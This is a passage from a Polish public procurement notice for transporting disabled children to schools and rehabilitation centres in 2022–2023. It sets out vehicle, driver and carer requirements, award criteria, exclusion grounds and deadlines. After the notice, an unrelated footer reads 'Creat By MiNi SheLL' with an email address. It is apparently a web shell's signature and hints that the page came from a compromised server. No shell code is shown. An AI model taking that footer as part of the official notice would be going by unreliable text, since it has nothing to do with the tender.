przez Wykonawcę pielęgniarki oraz użycia samochodu przystosowanego do przewozu dzieci na wózku inwalidzkim.<br/>Wykonawca:<br/>- zobowiązuje się w przypadku awarii pojazdu do niezwłocznego powiadomienia o tym fakcie szkoły oraz rodziców przewożonych uczniów i zapewnić transport zastępczy,<br/>- ponosi odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków przewozu dzieci i ich opiekuna,<br/>- ponosi odpowiedzialność za wszelkie szkody wyrządzone dzieciom i opiekunowi w trakcie przewozu oraz osobom trzecim w związku z wykonywaną usługą,<br/>- zobowiązuje się do zawarcia ubezpieczenia od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje organizację dowozu do ośrodków rehabilitacyjno- wychowawczych oraz przedszkoli w okresie wolnym od zajęć dydaktycznych w placówkach oświatowych, tj. przez 10 dni ferii zimowych oraz 49 dni wakacji letnich. W przypadku zgłoszenia przez rodziców/opiekunów prawnych dodatkowych wniosków o dowóz dziecka niepełnosprawnego do placówki oświatowej bądź ośrodka rehabilitacyjno- edukacyjno- wychowawczego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">norma emisji spalin EURO (środowiskowa)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania. Wykonawca w zakresie posiadania uprawnień do wykonywania określonej działalności musi posiadać aktualne zezwolenie lub licencję na wykonywanie transportu drogowego osób zgodnie z przepisami Ustawy z dnia 06 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r. poz. 180, 209),<br/>2) w przypadku składania oferty na część I zamówienia, w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata to za okres prowadzenia działalności wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonali dwie (2) usługi, których przedmiotem były usługi przewozowe osób niepełnosprawnych o wartości usługi nie mniejszej niż 50.000 zł brutto każda usługa,<br/>3) w przypadku składania oferty na część II zamówienia, w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata to za okres prowadzenia działalności wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonali dwie (2) usługi, których przedmiotem były usługi przewozowe osób niepełnosprawnych o wartości usługi nie mniejszej niż 50.000 zł brutto każda usługa,<br/>4) w przypadku składania oferty na część I zamówienia wykażą, że dysponują lub będą dysponować co najmniej 5 sprawnymi technicznie oznakowanymi środkami transportu do przewozu osób niepełnosprawnych, w tym co najmniej 1 pojazd dostosowany do przewozu osób niepełnosprawnych poruszających się na wózku inwalidzkim. Samochód ten powinien być wyposażony w rampę lub windę umożliwiającą wjazd wózkiem z osobą niepełnosprawną, odpowiednie pasy bezpieczeństwa oraz powinien posiadać co najmniej 1 miejsce dla pasażera przewożonego w wózku inwalidzkim uniemożliwiającego jego przesuwanie podczas jazdy np. szyny do mocowania wózków. Pojazd musi być wyposażony w pasy bezpieczeństwa i wysokie oparcia lub oparcia z zagłówkiem oraz w podstawki na siedzenia w ilości odpowiadającej przewożonym dzieciom, których wzrost nie przekracza 135 cm. Na prośbę rodziców/opiekunów przewożonych dzieci, których wzrost przekracza 135 cm należy odpowiednio zwiększyć ilość podstawek na siedzenia. Pojazd musi zapewniać swobodny dostęp opiekuna do każdego dziecka. Pojazdy muszą posiadać aktualne dowody rejestracyjne z wpisem w miejscu przeznaczenia-przewóz osób niepełnosprawnych oraz polisy ubezpieczenia OC i NNW,<br/>5) w przypadku składania oferty na część II zamówienia wykażą, że dysponują lub będą dysponować co najmniej 6 sprawnymi technicznie oznakowanymi środkami transportu do przewozu osób niepełnosprawnych, z możliwością dostosowania co najmniej 1 pojazdu do przewozu osób niepełnosprawnych, poruszających się na wózku inwalidzkim zgodnie z obowiązującymi przepisami. Pojazd musi być wyposażony w pasy bezpieczeństwa i wysokie oparcia lub oparcia z zagłówkiem oraz w podstawki na siedzenia w ilości odpowiadającej przewożonym dzieciom, których wzrost nie przekracza 135 cm. Na prośbę rodziców/opiekunów przewożonych dzieci, których wzrost przekracza 135 cm należy odpowiednio zwiększyć ilość podstawek na siedzenia. Pojazd musi zapewniać swobodny dostęp opiekuna do każdego dziecka. Pojazdy muszą posiadać aktualne dowody rejestracyjne z wpisem w miejscu przeznaczenia-przewóz osób niepełnosprawnych oraz polisy ubezpieczenia OC i NNW. W przypadku składania oferty na więcej niż jedną część należy wykazać dysponowanie liczbą pojazdów odpowiadającą sumie dla poszczególnych części. Niespełnienie tego warunku spowoduje wykluczenie Wykonawcy z całego postępowania (wszystkich zadań), <br/>6) w przypadku składania oferty na część I zamówienia wykażą, że dysponują lub będą dysponować kierowcami w liczbie nie mniejszej niż liczba pojazdów tj. minimum 5 kierowcami posiadającymi prawo jazdy oraz świadectwo kwalifikacji zawodowych zgodnie z przepisem art. 39 a ust. 1 ustawy z dnia 06 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r. poz. 180, 209) oraz opiekunami w liczbie nie mniejszej niż liczba pojazdów, tj. minimum 5 opiekunami posiadającymi ukończony kurs pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych,<br/>7) w przypadku składania oferty na część II zamówienia wykażą, że dysponują kierowcami w liczbie nie mniejszej niż liczba pojazdów tj. minimum 6 kierowcami posiadającymi prawo jazdy oraz świadectwo kwalifikacji zawodowych zgodnie z przepisem art. 39 a ust. 1 ustawy z dnia 06 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r. poz. 180, 209), oraz opiekunami w liczbie nie mniejszej niż liczba pojazdów tj. minimum 6 opiekunami posiadającymi ukończony kurs pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych. W przypadku składania oferty na więcej niż jedną część należy wykazać dysponowanie liczbą kierowców oraz opiekunów odpowiadającą sumie dla poszczególnych części. Niespełnienie tego warunku spowoduje wykluczenie Wykonawcy z całego postępowania (wszystkich zadań),<br/>8) spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 300.000zł.<br/>2. Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: „spełnia” lub „nie spełnia”, w oparciu o przedmiotowe i podmiotowe środki dowodowe oraz zawarte w nich informacje. W przypadku oferty wspólnej Zamawiający uzna, że warunki udziału w postępowaniu zostały spełnione jeżeli przynajmniej jeden z Wykonawców będzie go spełniał lub spełniać go będą Wykonawcy składający ofertę wspólną. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Pisemne zobowiązanie innego podmiotu do udostępnienia potencjału Wykonawcy musi być złożone wyłącznie w formie oryginału. W przypadku dokumentów potwierdzających wartość zamówienia, wartości podane w walutach innych niż złoty polski należy przeliczyć według średniego kursu NBP na dzień odbioru tych usług podając datę i kurs. Ponadto Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>Zamawiający przewiduje możliwość zmiany umowy w zakresie:<br/>1) zmiany liczby uczniów,<br/>2) zmiany liczby dni realizacji zamówienia,<br/>3) zmiany trasy,<br/>4) zmiany obowiązującej stawki podatku VAT.<br/>5) konieczności zmiany osób, które będą wykonywać usługi (kierowcy, opiekunowie) z przyczyn nieleżących po stronie Wykonawcy (np. długotrwała choroba, śmierć, utrata uprawnień). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 17:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta winna być złożona za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnym na miniPortalu, złożona pod rygorem nieważności w formie elektronicznej (opatrzona kwalifikowanym podpisem elektronicznym równoważnym pod względem skutków prawnych podpisowi własnoręcznemu) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-21 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com